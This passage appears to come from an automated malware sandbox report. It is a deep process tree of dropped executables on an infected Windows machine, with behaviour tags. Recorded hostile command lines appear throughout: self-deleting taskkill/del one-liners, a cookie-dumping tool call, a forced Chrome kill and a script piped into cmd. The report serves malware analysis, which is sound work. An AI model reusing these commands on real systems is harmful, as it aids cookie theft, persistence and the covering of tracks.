                                                                    PID:7204
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 900
                                                                    8⤵
                                                                    • Program crash
                                                                    PID:7424
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 1028
                                                                    8⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Program crash
                                                                    PID:512
                                                                • C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe" /silent /subid=482
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6972
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-KC3H2.tmp\vpn.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-KC3H2.tmp\vpn.tmp" /SL5="$803B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe" /silent /subid=482
                                                                    8⤵
                                                                      PID:7064
                                                                  • C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe" /8-23
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:7008
                                                                    • C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe" /8-23
                                                                      8⤵
                                                                        PID:4184
                                                              • C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe" ll
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:5784
                                                                • C:\Users\Admin\AppData\Local\Temp\is-S5ONT.tmp\setups.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S5ONT.tmp\setups.tmp" /SL5="$20394,2051888,270336,C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe" ll
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Loads dropped DLL
                                                                  PID:5996
                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                              3⤵
                                                                PID:1172
                                                                • C:\Users\Admin\AppData\Local\Temp\is-LNIT0.tmp\LabPicV3.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LNIT0.tmp\LabPicV3.tmp" /SL5="$103D2,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:5252
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-URR7I.tmp\alpATCHInO.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-URR7I.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                    5⤵
                                                                    • Drops file in Drivers directory
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in Program Files directory
                                                                    PID:5852
                                                                    • C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe
                                                                      "C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe" /VERYSILENT
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:6148
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SUAPO.tmp\prolab.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SUAPO.tmp\prolab.tmp" /SL5="$20372,575243,216576,C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe" /VERYSILENT
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:6212
                                                                    • C:\Users\Admin\AppData\Local\Temp\08-9cea9-e40-85eb2-72ea52878d297\Cefyshimewe.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\08-9cea9-e40-85eb2-72ea52878d297\Cefyshimewe.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      PID:6176
                                                                    • C:\Users\Admin\AppData\Local\Temp\f1-50522-576-1b5ba-d18a32bd64dee\ZHavyfaegace.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\f1-50522-576-1b5ba-d18a32bd64dee\ZHavyfaegace.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:6200
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe & exit
                                                                        7⤵
                                                                          PID:7160
                                                                          • C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:7064
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              9⤵
                                                                                PID:7232
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                9⤵
                                                                                  PID:6024
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe & exit
                                                                              7⤵
                                                                                PID:7568
                                                                                • C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe
                                                                                  8⤵
                                                                                  • Checks whether UAC is enabled
                                                                                  PID:8024
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe & exit
                                                                                7⤵
                                                                                  PID:7736
                                                                                  • C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe
                                                                                    8⤵
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4232
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                      9⤵
                                                                                        PID:2796
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe /silent & exit
                                                                                    7⤵
                                                                                      PID:7900
                                                                                      • C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe /silent
                                                                                        8⤵
                                                                                          PID:7856
                                                                                          • C:\ProgramData\8953801.exe
                                                                                            "C:\ProgramData\8953801.exe"
                                                                                            9⤵
                                                                                              PID:7348
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe & exit
                                                                                          7⤵
                                                                                            PID:5724
                                                                                            • C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe
                                                                                              8⤵
                                                                                              • Checks processor information in registry
                                                                                              PID:6404
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                9⤵
                                                                                                  PID:4472
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im wwfvd.exe /f
                                                                                                    10⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4140
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    10⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:1120
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe & exit
                                                                                              7⤵
                                                                                                PID:7768
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5824
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe
                                                                                                  8⤵
                                                                                                    PID:7884
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                      9⤵
                                                                                                        PID:6996
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im chrome.exe
                                                                                                          10⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7032
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe & exit
                                                                                                    7⤵
                                                                                                      PID:5148
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
                                                                                                        8⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:2796
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
                                                                                                          9⤵
                                                                                                            PID:7900
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wo13mqr5.1zt\GcleanerWW.exe /mixone & exit
                                                                                                        7⤵
                                                                                                          PID:6524
                                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4896
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-S72UM.tmp\lylal220.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-S72UM.tmp\lylal220.tmp" /SL5="$20314,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5288
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-6DQ1F.tmp\ysAGEL.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-6DQ1F.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                      5⤵
                                                                                                      • Drops file in Drivers directory
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5740
                                                                                                      • C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe
                                                                                                        "C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe" /VERYSILENT
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6316
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NM98K.tmp\irecord.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NM98K.tmp\irecord.tmp" /SL5="$60294,5922518,66560,C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe" /VERYSILENT
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:6436
                                                                                                          • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                            "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:6852
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\be-17034-2c9-d6c9a-7bc878e83ddae\Hosamimajae.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\be-17034-2c9-d6c9a-7bc878e83ddae\Hosamimajae.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks computer location settings
                                                                                                        PID:6356
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fd-5a4e2-abc-ae4a1-bfdc8164429ab\Ludekuripa.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\fd-5a4e2-abc-ae4a1-bfdc8164429ab\Ludekuripa.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6392
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe & exit
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1172
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe
                                                                                                            8⤵
                                                                                                              PID:6556
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                9⤵
                                                                                                                  PID:7276
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  9⤵
                                                                                                                    PID:3820
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe & exit
                                                                                                                7⤵
                                                                                                                  PID:5912
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe
                                                                                                                    8⤵
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    PID:6968
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe & exit
                                                                                                                  7⤵
                                                                                                                    PID:3356
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe
                                                                                                                      8⤵
                                                                                                                        PID:3012
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                          9⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:7996
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe /silent & exit
                                                                                                                      7⤵
                                                                                                                        PID:7368
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe /silent
                                                                                                                          8⤵
                                                                                                                            PID:7920
                                                                                                                            • C:\ProgramData\2470606.exe
                                                                                                                              "C:\ProgramData\2470606.exe"
                                                                                                                              9⤵
                                                                                                                                PID:7408
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe & exit
                                                                                                                            7⤵
                                                                                                                              PID:3472
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe
                                                                                                                                8⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                PID:7664
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                  9⤵
                                                                                                                                    PID:6060
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im wwfvd.exe /f
                                                                                                                                      10⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:7928
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /t 6
                                                                                                                                      10⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:7700
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe & exit
                                                                                                                                7⤵
                                                                                                                                  PID:7264
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe
                                                                                                                                    8⤵
                                                                                                                                      PID:7384
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe & exit
                                                                                                                                    7⤵
                                                                                                                                      PID:7992
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
                                                                                                                                        8⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:7196
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
                                                                                                                                          9⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:3452
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rpmpnqup.0mg\GcleanerWW.exe /mixone & exit
                                                                                                                                      7⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4680
                                                                                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe
                                                                                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:5156
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                4⤵
                                                                                                                                  PID:4732
                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5192
                                                                                                                                • C:\ProgramData\444710.exe
                                                                                                                                  "C:\ProgramData\444710.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:4680
                                                                                                                                  • C:\ProgramData\8625598.exe
                                                                                                                                    "C:\ProgramData\8625598.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:5172
                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5444
                                                                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5128
                                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:6116
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                                                                      4⤵
                                                                                                                                        PID:3532
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                          5⤵
                                                                                                                                            PID:3604
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4872
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:5096
                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                    1⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2236
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A336B1C2DE39BA37444D58EE03674830 C
                                                                                                                                      2⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4128
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 2699A3A6E38C153A33835621BCEDDFBA
                                                                                                                                      2⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:3784
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5968
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:1192
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:5804
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:2136
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:6244
                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      PID:5052
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:6276
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:7392
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        PID:6760
                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{485b83c2-a2f4-1e41-8453-b07803e69d6e}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:5476
                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          PID:3780
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:7316
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                          1⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          PID:7336
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
